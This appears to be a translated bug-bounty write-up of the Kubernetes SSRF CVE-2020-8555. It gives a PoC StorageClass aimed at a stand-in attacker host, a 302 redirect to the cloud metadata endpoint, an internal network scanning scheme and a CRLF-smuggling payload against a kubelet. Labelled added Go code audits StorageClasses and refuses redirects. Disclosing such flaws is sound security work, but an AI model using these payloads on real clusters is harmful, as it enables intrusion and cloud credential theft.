When it's not only about Kubernetes vulnerabilities...

Translator's note: the authors of this article describe in detail how they managed to discover the vulnerability CVE-2020-8555 in Kubernetes. Although at first it did not look particularly dangerous, in combination with other factors its criticality turned out to be maximal for some cloud providers. Several organizations generously rewarded the researchers for their work.


Who we are

We are two French security researchers who jointly discovered a vulnerability in Kubernetes. Our names are Brice Augras and Christophe Hauquiert, but on many Bug Bounty platforms we are known as Reeverzax and Hach respectively.

What happened?

This article is our way of sharing how an ordinary research project unexpectedly turned into the most exciting adventure in the life of bug hunters (at least so far).

As you probably know, bug hunters have a couple of well-known traits:

  • they live on pizza and beer;
  • they work while everyone else is asleep.

We are no exception to these rules: we usually meet on weekends and spend sleepless nights hacking. But one of those nights ended in a very unusual way.

Initially we were meeting to discuss our participation in a CTF the next day. While discussing Kubernetes security in a managed service environment, we remembered the old idea of SSRF (Server-Side Request Forgery) and decided to try using it as an attack scenario.

At 11 pm we sat down to do some research and went to bed early in the morning, very pleased with the results. It was thanks to this research that we came across the MSRC Bug Bounty program and came up with a privilege escalation exploit.

A few weeks/months passed, and our unexpected result earned us one of the highest rewards in the history of the Azure Cloud Bug Bounty, in addition to the one we received from Kubernetes!

Based on our research project, the Kubernetes Product Security Committee published CVE-2020-8555.

Now we would like to spread information about the discovered vulnerability as widely as possible. We hope you appreciate the find and share the technical details with other members of the infosec community!

Here is our story...

Context

To better understand what happened, let's first look at how Kubernetes works in a cloud-managed environment.

When you deploy a Kubernetes cluster in such an environment, the management layer is usually the responsibility of the cloud provider:

Figure: The control plane is located on the cloud provider's perimeter, while the Kubernetes nodes are on the customer's perimeter.

To allocate volumes dynamically, a mechanism is used that provisions them from an external storage backend and matches them with a PVC (persistent volume claim, i.e. a request for a volume).

Thus, after a PVC is created and bound to a StorageClass in the K8s cluster, the further actions needed to provide the volume are handled by the kube/cloud-controller-manager (its exact name depends on the release). (Translator's note: we have already written in more detail about the CCM, using the example of its implementation for one of the cloud providers, here.)

There are several types of provisioners supported by Kubernetes: most of them are included in the orchestrator core, while the rest are handled by additional provisioners deployed in pods in the cluster.

In our research, we focused on the built-in volume provisioning mechanism, shown below:

Figure: Dynamic volume provisioning using the built-in Kubernetes provisioner

In short, when Kubernetes is deployed in a managed environment, the controller manager is the responsibility of the cloud provider, but the volume creation request (number 3 in the diagram above) leaves the cloud provider's internal network. And this is where things get really interesting!

Hacking scenario

In this section, we explain how we took advantage of the workflow described above and got into the internals of the cloud service provider. It also shows how certain actions can be performed, such as obtaining internal credentials or escalating privileges.

One simple manipulation (in this case, Server-Side Request Forgery) allowed us to go beyond the customer environment into the clusters of various providers of managed K8s.

In our research we focused on the GlusterFS provisioner. Although the further sequence of actions is described in that context, Quobyte, StorageOS and ScaleIO are subject to the same vulnerability.

Figure: Abusing the dynamic volume provisioning mechanism

While analyzing the GlusterFS storage class in the Golang client source code, we noticed that on the first HTTP request (3) sent during volume creation, /volumes is appended to the end of the custom URL given in the resturl parameter.

We decided to get rid of this extra path by adding # to the resturl parameter. Here is the first YAML configuration we used to test for a semi-blind SSRF vulnerability (you can read more about semi-blind or half-blind SSRF, for example, here - translator's note):

apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
  name: poc-ssrf
provisioner: kubernetes.io/glusterfs
parameters:
  resturl: "http://attacker.com:6666/#"
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: poc-ssrf
spec:
  accessModes:
  - ReadWriteOnce
  volumeMode: Filesystem
  resources:
    requests:
      storage: 8Gi
  storageClassName: poc-ssrf

Then we used kubectl, the binary for managing a Kubernetes cluster remotely. Typically, cloud providers (Azure, Google, AWS, etc.) let you obtain credentials for use with this tool.

Thanks to this, we were able to apply our "special" file. Kube-controller-manager executed the resulting HTTP request:

kubectl create -f sc-poc.yaml

Figure: Response received on the attacker's side

Shortly after that, we were also able to read the HTTP response from the target server, via the describe pvc or get events commands in kubectl. And indeed: this standard Kubernetes driver is very verbose in its warnings/error messages...

Here is an example with a link to https://www.google.fr set as the resturl parameter:

kubectl describe pvc poc-ssrf
# or you can use kubectl get events

(screenshot in the original post)

With this approach we were limited to HTTP POST requests and could not obtain the contents of the response body if the return code was 201. Therefore, we decided to conduct additional research and extend this hacking scenario with new approaches.
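The resturl trick above is also what a cluster operator should look for. The following Go program is an added example, not code from the article or from Kubernetes: it audits the output of `kubectl get storageclass -o json` and flags StorageClasses of the four affected in-tree provisioners whose backend URL is malformed, contains a `#`, or points at a host outside an operator-maintained allowlist. The endpoint parameter names for Quobyte, StorageOS and ScaleIO are an assumption (taken from those plugins' documented parameters); only resturl appears on this page.

```go
package main

import (
	"encoding/json"
	"net/url"
	"strings"
)

// REST endpoint parameter of each in-tree provisioner named in the advisory
// (assumption: names as documented for these plugins; only resturl is on the page).
var endpointParam = map[string]string{
	"kubernetes.io/glusterfs": "resturl", "kubernetes.io/quobyte": "quobyteAPIServer",
	"kubernetes.io/storageos": "apiAddress", "kubernetes.io/scaleio": "gateway",
}

type storageClass struct {
	Metadata    struct{ Name string `json:"name"` } `json:"metadata"`
	Provisioner string                             `json:"provisioner"`
	Parameters  map[string]string                  `json:"parameters"`
}

// AuditStorageClasses takes `kubectl get storageclass -o json` output plus an
// allowlist of storage-backend hosts and returns one finding per StorageClass whose
// backend URL is malformed, carries a '#' (which drops the appended /volumes path),
// or points at a host outside the allowlist.
func AuditStorageClasses(raw []byte, allowedHosts map[string]bool) ([]string, error) {
	var list struct{ Items []storageClass `json:"items"` }
	if err := json.Unmarshal(raw, &list); err != nil {
		return nil, err
	}
	var findings []string
	for _, sc := range list.Items {
		param, affected := endpointParam[sc.Provisioner]
		if !affected {
			continue // this provisioner makes no operator-controlled REST calls
		}
		endpoint := sc.Parameters[param]
		u, err := url.Parse(endpoint)
		switch {
		case err != nil || u.Host == "" || strings.Contains(endpoint, "#"):
			findings = append(findings, sc.Metadata.Name+": malformed or fragment-bearing "+param+" "+endpoint)
		case !allowedHosts[u.Hostname()]:
			findings = append(findings, sc.Metadata.Name+": "+param+" host "+u.Hostname()+" not allowlisted")
		}
	}
	return findings, nil
}

// SampleList is constructed input: the article's PoC StorageClass beside a legitimate one.
const SampleList = `{"items":[{"metadata":{"name":"poc-ssrf"},"provisioner":"kubernetes.io/glusterfs",
"parameters":{"resturl":"http://attacker.com:6666/#"}},{"metadata":{"name":"gluster-prod"},
"provisioner":"kubernetes.io/glusterfs","parameters":{"resturl":"http://heketi.storage.internal:8080"}}]}`
```

Run it against a real cluster by piping kubectl's JSON into AuditStorageClasses with your own backend hosts as the allowlist; any finding is a StorageClass that can make kube-controller-manager talk to an address you did not intend.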

Evolution of our research

  • Advanced scenario #1: using a 302 redirect from an external server to change the HTTP method, giving a more flexible way of collecting internal data.
  • Advanced scenario #2: automating LAN scanning and discovery of internal resources.
  • Advanced scenario #3: using CRLF injection + HTTP smuggling ("request smuggling") to craft tailored HTTP requests and retrieve the data extracted from the kube-controller logs.

Technical details

  • The research used Azure Kubernetes Service (AKS) with Kubernetes version 1.12 in the North Europe region.
  • The scenarios described were carried out on the latest Kubernetes releases, except for the third scenario, because it requires Kubernetes built with a Golang version ≤ 1.12.
  • The attacker's external server: https://attacker.com.

Advanced scenario #1: redirecting an HTTP POST request into a GET and obtaining sensitive data

The original method was improved by configuring the attacker's server to return a 302 HTTP return code in order to convert the POST request into a GET request (step 4 in the diagram):

(diagram in the original post)

The first request (3), coming from the GlusterFS client (controller manager), is a POST. By following these steps we were able to turn it into a GET:

  • The resturl parameter in the StorageClass is set to http://attacker.com/redirect.php.
  • The endpoint https://attacker.com/redirect.php responds with a 302 HTTP status code and the following Location header: http://169.254.169.254. This could be any other internal resource; in this case the metadata URL is used only as an example.
  • By default, the Golang net/http library follows the redirect and, on a 302, converts the POST into a GET, resulting in an HTTP GET request to the target resource.

To read the body of the HTTP response, you need to describe the PVC object:

kubectl describe pvc xxx

Here is an example of an HTTP response in JSON format that we were able to receive:

(screenshot in the original post)

At that point, what could be done with the discovered vulnerability was limited by the following factors:

  • Inability to inject HTTP headers into the outgoing request.
  • Inability to perform a POST request with parameters in the body (this would be convenient for requesting a key's value from an etcd instance running on port 2379 if unencrypted HTTP is used).
  • Inability to retrieve the contents of the response body when the status code was 200 and the response did not have a JSON Content-Type.

Advanced scenario #2: scanning the local network

This half-blind SSRF method was then used to scan the cloud provider's internal network and probe various listening services (metadata instance, Kubelet, etcd, etc.) based on the responses of the kube controller.
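The POST-to-GET downgrade in scenario #1 is standard net/http behaviour on a 301/302/303, which is why a controller that sends requests to operator-supplied URLs must not follow redirects at all. The Go program below is an added example, not code from the article or from Kubernetes: it replays the exchange on two loopback stand-in servers (an "external" host answering 302 and an "internal" service recording what reaches it), first with the default client and then with a client whose CheckRedirect refuses to follow. Server paths and payloads are constructed for the demonstration.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// Simulate replays step 3 of the article's diagram with the given client: a provisioner
// POSTs to an operator-supplied URL, the "external" host answers with a 302 to an
// "internal" service, and we record which methods that internal service receives.
// Both servers are constructed stand-ins on loopback. It returns the methods seen
// internally and the status code the provisioner ends up with.
func Simulate(client *http.Client) ([]string, int, error) {
	var seen []string
	internal := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		seen = append(seen, r.Method)
		w.Header().Set("Content-Type", "application/json")
		fmt.Fprint(w, `{"note":"only reachable from inside the provider network"}`)
	}))
	defer internal.Close()
	external := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		http.Redirect(w, r, internal.URL+"/latest/meta-data/", http.StatusFound)
	}))
	defer external.Close()
	resp, err := client.Post(external.URL+"/volumes", "application/json", strings.NewReader(`{"size":"8Gi"}`))
	if err != nil {
		return nil, 0, err
	}
	resp.Body.Close()
	return seen, resp.StatusCode, nil
}

// HardenedClient is the fix a provisioner should apply: never follow redirects from a
// backend URL an operator controls. The 302 itself becomes the (failed) response and
// nothing is ever sent to the Location target.
func HardenedClient() *http.Client {
	return &http.Client{
		CheckRedirect: func(*http.Request, []*http.Request) error {
			return http.ErrUseLastResponse
		},
	}
}

func main() {
	seen, code, _ := Simulate(http.DefaultClient)
	fmt.Println("default client: seen internally", seen, "status", code) // [GET] 200
	seen, code, _ = Simulate(HardenedClient())
	fmt.Println("hardened client: seen internally", seen, "status", code) // [] 302
}
```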

(screenshot in the original post)

First, the standard listening ports of Kubernetes components were identified (8443, 10250, 10251, etc.), and then we had to automate the scanning process.

Seeing that this method of scanning resources is very specific and not compatible with classic scanners and SSRF tools, we decided to write our own workers in a bash script that automates the whole process.

For example, to quickly scan the 172.16.0.0/12 range of the internal network, 15 workers were launched in parallel. The IP range above was chosen only as an example and can be changed to the IP range of your specific service provider.

To scan one IP address and one port, you need to do the following:

  • delete the previously checked StorageClass;
  • delete the previously checked Persistent Volume Claim;
  • change the IP and port values in sc.yaml;
  • create a StorageClass with the new IP and port;
  • create a new PVC;
  • extract the scan result by describing the PVC.

Advanced scenario #3: CRLF injection + HTTP smuggling in "old" versions of the Kubernetes cluster

If, in addition to this, the provider offered customers old versions of the K8s cluster and gave them access to the kube-controller-manager logs, the effect became even more significant.

It is indeed much more convenient for an attacker to modify HTTP requests at will in order to obtain a full HTTP response.

(diagram in the original post)

To carry out the last scenario, the following conditions had to be met:

  • The user must have access to the kube-controller-manager logs (as, for example, in Azure LogInsights).
  • The Kubernetes cluster must use a Golang version lower than 1.12.

We deployed a local environment that simulated the communication between the GlusterFS Go client and a fake target server (we will refrain from publishing the PoC for now).

A vulnerability was found that affects Golang versions lower than 1.12 and allows attackers to perform HTTP smuggling/CRLF attacks.

By combining the half-blind SSRF described above with this one, we were able to send requests to our liking, including replacing headers, the HTTP method, parameters and data, which kube-controller-manager then processed.

Here is an example of a working "bait" in the StorageClass resturl parameter that implements such an attack scenario:

http://172.31.X.1:10255/healthz? HTTP/1.1\r\nConnection: keep-alive\r\nHost: 172.31.X.1:10255\r\nContent-Length: 1\r\n\r\n1\r\nGET /pods? HTTP/1.1\r\nHost: 172.31.X.1:10255\r\n\r\n

The result is an unsolicited response error, a message that is written to the controller logs. Thanks to the verbosity enabled by default, the contents of the HTTP response are saved there as well.

(screenshot in the original post)

This was our most effective "bait" within the proof of concept.

Using this approach, we were able to carry out some of the following attacks on the clusters of various managed k8s providers: privilege escalation with credentials from metadata instances, master DoS via (unencrypted) HTTP requests to etcd master instances, and so on.

Consequences

In the official Kubernetes statement regarding the SSRF vulnerability we found, it was rated CVSS 6.3/10: CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N. If we only consider the vulnerability within the Kubernetes perimeter, the integrity vector qualifies as None.

However, assessing the possible consequences in the context of a managed service environment (and this was the most interesting part of our research!) led us to reclassify the vulnerability as Critical, CVSS 10/10, for many distributors.

Below is additional information to help you understand our reasoning when assessing the potential impact in cloud environments:

Integrity

  • Execute commands remotely using the obtained internal credentials.
  • Reproduce the above scenario using the IDOR (Insecure Direct Object Reference) method with other resources found on the local network.

Confidentiality

  • Lateral movement thanks to stolen cloud credentials (e.g. from the metadata API).
  • Information gathering by scanning the local network (determining the SSH version, the HTTP server version, ...).
  • Collecting instance and infrastructure information by polling internal APIs such as the metadata API (http://169.254.169.254, ...).
  • Stealing customer data using cloud credentials.

Availability

All the exploitation scenarios related to the integrity attack vectors can be used for destructive actions and make the master instances of the customer perimeter (or any other) unavailable.

Since we were in a managed K8s environment and were assessing the impact on integrity, we can imagine many scenarios that could affect availability. Additional examples include corrupting the etcd database or making a critical call to the Kubernetes API.

Timeline

  • December 6, 2019: vulnerability reported to MSRC Bug Bounty.
  • January 3, 2020: a third party notified the Kubernetes developers that we were working on a security issue and asked them to consider the SSRF an internal (in-core) vulnerability. We then provided a general report with technical details about the source of the problem.
  • January 15, 2020: we provided technical and general reports to the Kubernetes developers at their request (via the HackerOne platform).
  • January 15, 2020: the Kubernetes developers notified us that the half-blind SSRF + CRLF injection for past releases is considered an in-core vulnerability. We immediately stopped analyzing the perimeters of other service providers: the K8s team was now dealing with the root cause.
  • January 15, 2020: MSRC reward received via HackerOne.
  • January 16, 2020: the Kubernetes PSC (Product Security Committee) acknowledged the vulnerability and asked to keep it confidential until mid-March due to the large number of potential victims.
  • February 11, 2020: Google VRP reward received.
  • March 4, 2020: Kubernetes reward received via HackerOne.
  • March 15, 2020: the planned public disclosure was postponed because of the COVID-19 situation.
  • June 1, 2020: joint Kubernetes + Microsoft statement on the vulnerability.

TL;DR

  • We drink beer and eat pizza :)
  • We discovered an in-core vulnerability in Kubernetes, although we had no intention of doing so.
  • We carried out additional analysis on the clusters of various cloud providers and were able to increase the damage caused by the vulnerability, receiving additional awesome bonuses.
  • You will find a lot of technical details in this article. We would be happy to discuss them with you (Twitter: @ReeverZax & @__chika_).
  • It turned out that all the formalities and reporting took much longer than expected.


Source: www.habr.com
